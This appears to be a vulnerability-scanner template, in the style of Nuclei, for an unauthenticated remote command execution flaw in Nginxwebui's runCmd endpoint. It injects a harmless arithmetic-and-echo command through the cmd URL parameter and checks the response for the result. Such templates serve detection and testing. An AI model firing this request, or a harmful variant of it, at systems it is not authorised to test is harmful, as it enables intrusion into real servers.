id: nginxwebui-runcmd-rce

info:
  name: Nginxwebui - RunCMD Remote Command Execution Vulnerability
  author: unknown
  severity: critical
  description: |
    Nginxwebui Causes Runcmd Remote Command Execution Vulnerability for Effective Authentication
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491574&idx=1&sn=043729e27577a851856c002cfb0409b8
  tags: nginxwebui

http:
  - method: GET
    path:
      - "{{BaseURL}}/AdminPage/conf/runCmd?cmd=expr%20199812440%20-%2010079%26%26echo%20nginx"
    matchers:
      - type: word
        words:
          - "<br>nginx<br>"
          - '"success":true'
          - '199802361'
        part: body
        condition: and